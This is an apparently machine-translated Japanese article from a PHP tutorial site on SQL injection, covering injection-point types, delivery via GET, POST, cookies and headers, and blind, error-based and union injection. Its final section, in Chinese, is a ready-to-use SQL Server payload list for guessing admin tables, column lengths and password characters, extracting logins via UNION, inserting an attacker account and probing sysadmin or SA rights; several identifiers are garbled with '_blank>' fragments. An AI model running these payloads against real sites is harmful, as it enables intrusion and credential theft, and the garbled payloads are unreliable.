ホームページ  >  記事  >  データベース  >  SQLインジェクションステートメントとは何ですか?

SQLインジェクションステートメントとは何ですか?

藏色散人
藏色散人オリジナル
2021-03-10 14:01:3837454ブラウズ

SQL インジェクション ステートメントには 3 つのタイプがあります: 1. 数値インジェクション ポイント (「id=1 および 1=1 のテーブル名から選択 *」など); 2. 文字インジェクション ポイント (次のようなステートメント) 「 select * from table name where name...」などのステートメント; 3. インジェクションポイントを検索します。

SQLインジェクションステートメントとは何ですか?

この記事の動作環境: Windows 7 システム、SQL Server 2016 バージョン、Dell G3 コンピューター。

一般的な SQL インジェクション ステートメント

SQL インジェクション

1. SQL インジェクションとは

SQL コマンドを Web フォームに挿入するまたは、ドメイン名またはページリクエストのクエリ文字列を入力し、最終的にサーバーをだまして悪意のある SQL コマンドを実行させます。

2. SQL インジェクション タイプ

インジェクション ポイントのタイプによる分類

(1) 数値インジェクション ポイント

多くの Web リンクは、同様の構造 http を持っています。 //xxx.com/users.php?id=1 このフォームに基づくインジェクションは、インジェクション ポイント ID タイプが数値であるため、一般にデジタル インジェクション ポイントと呼ばれます。ユーザーの個人情報の表示、記事の表示など、ほとんどの Web ページでなど、ほとんどの場合、この形式の構造を使用して ID などの情報を転送し、それをバックエンドに渡し、データベース内の対応する情報を照会してフロントデスクに返します。このタイプの SQL ステートメントのプロトタイプはおそらく select * from table name where id=1 です。インジェクションがある場合は、ブラスト用に次のような SQL インジェクション ステートメントを構築できます。 select * fromテーブル名 (id=1 および 1=1)

# (2) 文字挿入ポイント

#Web リンクも同様の構造になっています http://xxx.com/users.php? name= admin の形式では、注入ポイント名のタイプは文字タイプであるため、文字注入ポイントと呼ばれます。このタイプの SQL ステートメントのプロトタイプは、おそらく

select * from table name where name='admin' です。数値注入タイプの SQL ステートメントのプロトタイプと比較して、より多くの引用符があることに注意してください。一重引用符、または二重引用符。インジェクションがある場合は、次のような SQL インジェクション ステートメントを構築して爆発させることができます: select * from table name where name='admin' and 1=1 ' これらの煩わしい引用符を取り除く必要があります。マークが付いています。

(3) 注入ポイントの検索

これは特殊な注入です。このタイプのインジェクションは主に、データ検索を実行するときに検索パラメータをフィルタリングしないことを指します。通常、リンク アドレスには

"keyword=keywords" が含まれます。一部はリンク アドレスには表示されず、検索ボックス、フォームの送信。このタイプの注入ポイントによって送信される SQL ステートメントのプロトタイプは、大まかに次のとおりです。 select * from table name where field like '%keyword%' インジェクションがある場合は、次のような SQL インジェクション ステートメントを構築できます。展開: select * from table name where field like '%test%' and '%1%'='%1%'

次の方法に従って分類します。データ送信

(1) GET インジェクション

データの送信方法は GET で、インジェクション ポイントの場所は GET パラメーター セクションにあります。たとえば、http://xxx.com/news.php?id=1 というリンクがあります。id は注入ポイントです。

(2) POST インジェクション

POST メソッドを使用してデータを送信します。インジェクション ポイントは、フォーム内でよく発生する POST データ部分にあります。

(3) Cookie インジェクションHTTP リクエストはクライアントの Cookie を取得します。インジェクション ポイントは Cookie 内の特定のフィールドに存在します。

(4) HTTP ヘッダー インジェクション

インジェクション ポイントは、HTTP リクエスト ヘッダーの特定のフィールドにあります。たとえば、これは [User-Agent] フィールドに存在します。厳密に言うと、Cookie は実際にはヘッダー インジェクションの一種と考えるべきです。 HTTP リクエスト中、Cookie はヘッダー内のフィールドであるためです。

実行効果による分類

(1) Booleanベースのブラインドインジェクション

は、条件の真偽を判定できるインジェクションです。返されたページに基づいて。

(2) 時間ベースのブラインド インジェクション

つまり、ページから返されたコンテンツに基づいて情報を判断することはできません。条件文を使用して、時間遅延ステートメントが正しいかどうかを確認できます。実行されるかどうか (つまり、ページの戻り時間が増加するかどうか)。

(3) エラー報告に基づく挿入

つまり、ページはエラー情報を返すか、挿入されたステートメントの結果がページに直接返されます。

    一重引用符
  1. 二重引用符
  2. 数値インジェクションに基づく
(4) ユニオンクエリインジェクション

ユニオンの場合はインジェクションが使用可能です。

一般的に使用されるステートメント

1.判断有无注入点 
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 
and 0<>(select count(*) from *) 
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 
and 0<(select count(*) from admin) 
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 
and 1=(select count(*) from admin where len(*)>0)-- 
and 1=(select count(*) from admin where len(用户字段名称name)>0) 
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 
and 1=(select count(*) from admin where len(*)>0) 
and 1=(select count(*) from admin where len(name)>6) 错误 
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确 
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符 
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
group by users.id having 1=1-- 
group by users.id, users.username, users.password, users.privs having 1=1-- 
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id)- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id,login_blank>_name)- 
UNION SELECT TOP 1 login_blank>_name FROM logintable- 
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul--
看_blank>服务器打的补丁=出错了打了SP4补丁 
and 1=(select @@VERSION)--
看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) 
and sa=(SELECT System_blank>_user)-- 
and user_blank>_name()=dbo-- 
and 0<>(select user_blank>_name()--

推奨 (無料):

sql チュートリアル

以上がSQLインジェクションステートメントとは何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。